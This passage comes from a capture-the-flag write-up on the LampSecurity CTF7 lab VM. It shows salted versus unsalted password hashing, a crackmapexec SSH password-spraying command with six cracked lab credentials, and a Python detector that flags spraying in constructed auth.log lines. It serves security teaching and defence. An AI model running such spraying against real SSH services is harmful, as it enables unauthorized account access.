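    return salt.hex() + "$" + digest.hex()


def verify_salted(password, stored, rounds=200_000):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), rounds)
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    creds = parse_insert_dump(DUMP_LINE) + parse_mysql_table(TABLE_OUTPUT)
    print(dictionary_check(creds, WORDLIST))   # brian -> '', test -> 'test', 1 -> '1', john -> None
    # Same password hashed twice: identical MD5, but two different salted digests.
    print(salted_hash("test") != salted_hash("test"))
```

The point of the last two functions is the asymmetry hashcat exploited: with unsalted MD5 one pass over the wordlist covers all thirteen accounts, and two users with the same password share a digest; with a per-user salt and a deliberately slow KDF, each account has to be attacked on its own and at a small fraction of the speed shown in the hashcat status above.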

We use these credentials for a password spraying attack.

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ sudo crackmapexec ssh 192.168.56.141 -u username -p pass --continue-on-success | grep +
SSH 192.168.56.141 22 192.168.56.141 [+] brian:my2cents
SSH 192.168.56.141 22 192.168.56.141 [+] alice:turtles77
SSH 192.168.56.141 22 192.168.56.141 [+] leon:qwer1234
SSH 192.168.56.141 22 192.168.56.141 [+] julia:madrid
SSH 192.168.56.141 22 192.168.56.141 [+] michael:somepassword
SSH 192.168.56.141 22 192.168.56.141 [+] charles:chuck33

All good.
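From the defender's side, a spray like the one above is conspicuous in sshd's auth log: a single source touching many distinct accounts within seconds, here with most attempts succeeding because the passwords were reused. As an added example that is not part of the post, the following parses constructed auth.log lines modelled on that result and flags the pattern. The log lines, the hostname, the year and the thresholds are made up for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed auth.log excerpt: one source tries many accounts within a few
# seconds and most attempts succeed. The earlier single login from another
# address is ordinary activity and must not be flagged.
SAMPLE_LOG = """\
May  3 09:12:44 localhost sshd[1800]: Accepted password for john from 192.168.56.20 port 40001 ssh2
May  3 14:40:01 localhost sshd[2101]: Accepted password for brian from 192.168.56.132 port 50110 ssh2
May  3 14:40:01 localhost sshd[2103]: Failed password for john from 192.168.56.132 port 50111 ssh2
May  3 14:40:02 localhost sshd[2105]: Accepted password for alice from 192.168.56.132 port 50112 ssh2
May  3 14:40:02 localhost sshd[2107]: Accepted password for leon from 192.168.56.132 port 50113 ssh2
May  3 14:40:03 localhost sshd[2109]: Accepted password for julia from 192.168.56.132 port 50114 ssh2
May  3 14:40:03 localhost sshd[2111]: Accepted password for michael from 192.168.56.132 port 50115 ssh2
May  3 14:40:04 localhost sshd[2113]: Accepted password for charles from 192.168.56.132 port 50116 ssh2
"""

LOG_RE = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d+) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+)"
)


def parse_line(line, year=2023):
    """Return (timestamp, source, user, succeeded) or None for unrelated lines.
    syslog stamps carry no year, so the caller supplies one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
    return ts, m["src"], m["user"], m["result"] == "Accepted"


def detect_spraying(lines, min_users=3, window=timedelta(minutes=5)):
    """Flag any source that touches at least min_users distinct accounts inside
    one window. Successes and failures both count: a spray with reused
    passwords looks like the log above, mostly successes."""
    by_src = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, src, user, ok = parsed
            by_src[src].append((ts, user, ok))
    alerts = []
    for src, events in by_src.items():
        events.sort()
        for i, (start, _, _) in enumerate(events):
            in_window = [e for e in events[i:] if e[0] - start <= window]
            users = {u for _, u, _ in in_window}
            if len(users) >= min_users:
                alerts.append({
                    "src": src,
                    "users": sorted(users),
                    "accepted": sum(1 for _, _, ok in in_window if ok),
                    "window_start": start,
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_spraying(SAMPLE_LOG.splitlines()):
        print(alert)
```

Counting distinct usernames per source rather than failures per account is what separates a spray from ordinary typos: the host at 192.168.56.20 logs in once as one user and stays silent, while the other source produces seven accounts in four seconds with six successes, which a failure-only rule would miss almost entirely.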